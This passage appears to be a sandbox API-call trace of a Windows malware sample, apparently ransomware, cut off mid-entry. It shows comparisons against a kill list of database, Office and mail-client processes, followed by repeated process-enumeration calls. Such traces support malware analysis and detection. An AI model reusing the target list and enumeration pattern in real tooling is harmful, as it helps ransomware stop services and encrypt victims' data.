[0080.375] lstrcmpiW (lpString1="csrss.exe", lpString2="msftesql.exe") returned -1 [0080.375] lstrcmpiW (lpString1="csrss.exe", lpString2="sqlagent.exe") returned -1 [0080.375] lstrcmpiW (lpString1="csrss.exe", lpString2="sqlwriter.exe") returned -1 [0080.375] lstrcmpiW (lpString1="csrss.exe", lpString2="oracle.exe") returned -1 [0080.375] lstrcmpiW (lpString1="csrss.exe", lpString2="ocssd.exe") returned -1 [0080.375] lstrcmpiW (lpString1="csrss.exe", lpString2="dbsnmp.exe") returned -1 [0080.375] lstrcmpiW (lpString1="csrss.exe", lpString2="synctime.exe") returned -1 [0080.375] lstrcmpiW (lpString1="csrss.exe", lpString2="mydesktopqos.exe") returned -1 [0080.375] lstrcmpiW (lpString1="csrss.exe", lpString2="agntsvc.exe") returned 1 [0080.375] lstrcmpiW (lpString1="csrss.exe", lpString2="isqlpplussvc.exe") returned -1 [0080.375] lstrcmpiW (lpString1="csrss.exe", lpString2="isqlpussvc.exe") returned -1 [0080.375] lstrcmpiW (lpString1="csrss.exe", lpString2="xfssvccon.exe") returned -1 [0080.375] lstrcmpiW (lpString1="csrss.exe", lpString2="mydesktopservice.exe") returned -1 [0080.376] lstrcmpiW (lpString1="csrss.exe", lpString2="ocautoupds.exe") returned -1 [0080.376] lstrcmpiW (lpString1="csrss.exe", lpString2="encsvc.exe") returned -1 [0080.376] lstrcmpiW (lpString1="csrss.exe", lpString2="firefoxconfig.exe") returned -1 [0080.376] lstrcmpiW (lpString1="csrss.exe", lpString2="tbirdconfig.exe") returned -1 [0080.376] lstrcmpiW (lpString1="csrss.exe", lpString2="ocomm.exe") returned -1 [0080.376] lstrcmpiW (lpString1="csrss.exe", lpString2="mysqld.exe") returned -1 [0080.376] lstrcmpiW (lpString1="csrss.exe", lpString2="mysqld-nt") returned -1 [0080.376] lstrcmpiW (lpString1="csrss.exe", lpString2="mysqld-opt") returned -1 [0080.376] lstrcmpiW (lpString1="csrss.exe", lpString2="dbeng50.exe") returned -1 [0080.376] lstrcmpiW (lpString1="csrss.exe", lpString2="sqbcoreservice.exe") returned -1 [0080.376] lstrcmpiW (lpString1="csrss.exe", lpString2="excel.exe") returned -1 [0080.376] lstrcmpiW (lpString1="csrss.exe", lpString2="infopath.exe") returned -1 [0080.376] lstrcmpiW (lpString1="csrss.exe", lpString2="msaccess.exe") returned -1 [0080.376] lstrcmpiW (lpString1="csrss.exe", lpString2="mspub.exe") returned -1 [0080.376] lstrcmpiW (lpString1="csrss.exe", lpString2="onenote.exe") returned -1 [0080.376] lstrcmpiW (lpString1="csrss.exe", lpString2="outlook.exe") returned -1 [0080.376] lstrcmpiW (lpString1="csrss.exe", lpString2="powerpnt.exe") returned -1 [0080.376] lstrcmpiW (lpString1="csrss.exe", lpString2="stream.exe") returned -1 [0080.377] lstrcmpiW (lpString1="csrss.exe", lpString2="thebat.exe") returned -1 [0080.377] lstrcmpiW (lpString1="csrss.exe", lpString2="thebat64.exe") returned -1 [0081.351] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x100 [0081.359] Process32FirstW (in: hSnapshot=0x100, lppe=0x8cfb04 | out: lppe=0x8cfb04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0082.619] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x104 [0082.626] Process32FirstW (in: hSnapshot=0x104, lppe=0x8cfb04 | out: lppe=0x8cfb04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0083.864] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x100 [0083.874] Process32FirstW (in: hSnapshot=0x100, lppe=0x8cfb04 | out: lppe=0x8cfb04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0084.789] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x100 [0084.797] Process32FirstW (in: hSnapshot=0x100, lppe=0x8cfb04 | out: lppe=0x8cfb04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0085.338] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x104 [0085.345] Process32FirstW (in: hSnapshot=0x104, lppe=0x8cfb04 | out: lppe=0x8cfb04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0086.058] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x104 [0086.065] Process32FirstW (in: hSnapshot=0x104, lppe=0x8cfb04 | out: lppe=0x8cfb04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0086.731] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x104 [0086.738] Process32FirstW (in: hSnapshot=0x104, lppe=0x8cfb04 | out: lppe=0x8cfb04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0087.583] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x104 [0087.591] Process32FirstW (in: hSnapshot=0x104, lppe=0x8cfb04 | out: lppe=0x8cfb04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0088.624] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x104 [0088.630] Process32FirstW (in: hSnapshot=0x104, lppe=0x8cfb04 | out: lppe=0x8cfb04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0088.940] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xec [0088.949] Process32FirstW (in: hSnapshot=0xec, lppe=0x8cfb04 | out: lppe=0x8cfb04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0089.483] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xec [0089.491] Process32FirstW (in: hSnapshot=0xec, lppe=0x8cfb04 | out: lppe=0x8cfb04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0089.978] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xec [0089.987] Process32FirstW (in: hSnapshot=0xec, lppe=0x8cfb04 | out: lppe=0x8cfb04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0090.467] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xec [0090.472] Process32FirstW (in: hSnapshot=0xec, lppe=0x8cfb04 | out: lppe=0x8cfb04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0091.154] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xec [0091.162] Process32FirstW (in: hSnapshot=0xec, lppe=0x8cfb04 | out: lppe=0x8cfb04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0092.674] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xec [0092.690] Process32FirstW (in: hSnapshot=0xec, lppe=0x8cfb04 | out: lppe=0x8cfb04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0093.552] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xec [0093.559] Process32FirstW (in: hSnapshot=0xec, lppe=0x8cfb04 | out: lppe=0x8cfb04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0094.498] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x104 [0094.506] Process32FirstW (in: hSnapshot=0x104, lppe=0x8cfb04 | out: lppe=0x8cfb04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0095.629] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x104 [0095.636] Process32FirstW (in: hSnapshot=0x104, lppe=0x8cfb04 | out: lppe=0x8cfb04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0096.977] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xec [0096.985] Process32FirstW (in: hSnapshot=0xec, lppe=0x8cfb04 | out: lppe=0x8cfb04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0097.822] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xec [0097.830] Process32FirstW (in: hSnapshot=0xec, lppe=0x8cfb04 | out: lppe=0x8cfb04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0098.288] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xec [0098.294] Process32FirstW (in: hSnapshot=0xec, lppe=0x8cfb04 | out: lppe=0x8cfb04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0099.406] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xec [0099.413] Process32FirstW (in: hSnapshot=0xec, lppe=0x8cfb04 | out: lppe=0x8cfb04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0100.088] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xec [0100.093] Process32FirstW (in: hSnapshot=0xec, lppe=0x8cfb04 | out: lppe=0x8cfb04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0101.044] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xec [0101.053] Process32FirstW (in: hSnapshot=0xec, lppe=0x8cfb04 | out: lppe=0x8cfb04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0101.842] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xec [0101.849] Process32FirstW (in: hSnapshot=0xec, lppe=0x8cfb04 | out: lppe=0x8cfb04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0102.387] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xec [0102.393] Process32FirstW (in: hSnapshot=0xec, lppe=0x8cfb04 | out: lppe=0x8cfb04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0102.946] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x104 [0102.955] Process32FirstW (in: hSnapshot=0x104, lppe=0x8cfb04 | out: lppe=0x8cfb04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0103.407] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x104 [0103.414] Process32FirstW (in: hSnapshot=0x104, lppe=0x8cfb04 | out: lppe=0x8cfb04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0103.826] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xec [0103.833] Process32FirstW (in: hSnapshot=0xec, lppe=0x8cfb04 | out: lppe=0x8cfb04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0104.157] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xec [0104.161] Process32FirstW (in: hSnapshot=0xec, lppe=0x8cfb04 | out: lppe=0x8cfb04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0104.569] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xec [0104.576] Process32FirstW (in: hSnapshot=0xec, lppe=0x8cfb04 | out: lppe=0x8cfb04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0105.265] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x124 [0105.272] Process32FirstW (in: hSnapshot=0x124, lppe=0x8cfb04 | out: lppe=0x8cfb04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0105.273] Process32NextW (in: hSnapshot=0x124, lppe=0x8cfb04 | out: lppe=0x8cfb04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0105.274] Process32NextW (in: hSnapshot=0x124, lppe=0x8cfb04 | out: lppe=0x8cfb04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0105.275] Process32NextW (in: hSnapshot=0x124, lppe=0x8cfb04 | out: lppe=0x8cfb04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0105.276] Process32NextW (in: hSnapshot=0x124, lppe=0x8cfb04 | out: lppe=0x8cfb04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0105.277] Process32NextW (in: hSnapshot=0x124, lppe=0x8cfb04 | out: lppe=0x8cfb04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0105.277] Process32NextW (in: hSnapshot=0x124, lppe=0x8cfb04 | out: lppe=0x8cfb04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0105.278] Process32NextW (in: hSnapshot=0x124, lppe=0x8cfb04 | out: lppe=0x8cfb04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0105.279] Process32NextW (in: hSnapshot=0x124, lppe=0x8cfb04 | out: lppe=0x8cfb04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0105.279] Process32NextW (in: hSnapshot=0x124, lppe=0x8cfb04 | out: lppe=0x8cfb04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0105.280] Process32NextW (in: hSnapshot=0x124, lppe=0x8cfb04 | out: lppe=0x8cfb04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0105.281] Process32NextW (in: hSnapshot=0x124, lppe=0x8cfb04 | out: lppe=0x8cfb04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0105.282] Process32NextW (in: hSnapshot=0x124, lppe=0x8cfb04 | out: lppe=0x8cfb04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0105.282] Process32NextW (in: hSnapshot=0x124, lppe=0x8cfb04 | out: lppe=0x8cfb04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x338, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0105.283] Process32NextW (in: hSnapshot=0x124, lppe=0x8cfb04 | out: lppe=0x8cfb04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x370, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2d, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0105.284] Process32NextW (in: hSnapshot=0x124, lppe=0x8cfb04 | out: lppe=0x8cfb04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0105.285] Process32NextW (in: hSnapshot=0x124, lppe=0x8cfb04 | out: lppe=0x8cfb04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0105.286] Process32NextW (in: hSnapshot=0x124, lppe=0x8cfb04 | out: lppe=0x8cfb04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x11c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0105.287] Process32NextW (in: hSnapshot=0x124, lppe=0x8cfb04 | out: lppe=0x8cfb04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x444, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x338, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0105.288] Process32NextW (in: hSnapshot=0x124, lppe=0x8cfb04 | out: lppe=0x8cfb04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x454, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x20, th32ParentProcessID=0x43c, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0105.289] Process32NextW (in: hSnapshot=0x124, lppe=0x8cfb04 | out: lppe=0x8cfb04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x47c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0105.289] Process32NextW (in: hSnapshot=0x124, lppe=0x8cfb04 | out: lppe=0x8cfb04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0105.290] Process32NextW (in: hSnapshot=0x124, lppe=0x8cfb04 | out: lppe=0x8cfb04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0105.291] Process32NextW (in: hSnapshot=0x124, lppe=0x8cfb04 | out: lppe=0x8cfb04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x588, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x370, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0105.292] Process32NextW (in: hSnapshot=0x124, lppe=0x8cfb04 | out: lppe=0x8cfb04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x32c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="expense.exe")) returned 1 [0105.293] Process32NextW (in: hSnapshot=0x124, lppe=0x8cfb04 | out: lppe=0x8cfb04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="restructuring.exe")) returned 1 [0105.294] Process32NextW (in: hSnapshot=0x124, lppe=0x8cfb04 | out: lppe=0x8cfb04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x730, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="seem.exe")) returned 1 [0105.295] Process32NextW (in: hSnapshot=0x124, lppe=0x8cfb04 | out: lppe=0x8cfb04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x78c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="und-rica.exe")) returned 1 [0105.296] Process32NextW (in: hSnapshot=0x124, lppe=0x8cfb04 | out: lppe=0x8cfb04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x60c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="fighters.exe")) returned 1 [0105.297] Process32NextW (in: hSnapshot=0x124, lppe=0x8cfb04 | out: lppe=0x8cfb04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x20c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="dimensions flyer.exe")) returned 1 [0105.297] Process32NextW (in: hSnapshot=0x124, lppe=0x8cfb04 | out: lppe=0x8cfb04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x244, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="des.exe")) returned 1 [0105.298] Process32NextW (in: hSnapshot=0x124, lppe=0x8cfb04 | out: lppe=0x8cfb04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x364, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="casting.exe")) returned 1 [0105.299] Process32NextW (in: hSnapshot=0x124, lppe=0x8cfb04 | out: lppe=0x8cfb04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="morrison-consult.exe")) returned 1 [0105.300] Process32NextW (in: hSnapshot=0x124, lppe=0x8cfb04 | out: lppe=0x8cfb04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x48c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="targeted.exe")) returned 1 [0105.300] Process32NextW (in: hSnapshot=0x124, lppe=0x8cfb04 | out: lppe=0x8cfb04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="modify_vital_consider.exe")) returned 1 [0105.301] Process32NextW (in: hSnapshot=0x124, lppe=0x8cfb04 | out: lppe=0x8cfb04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x410, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, 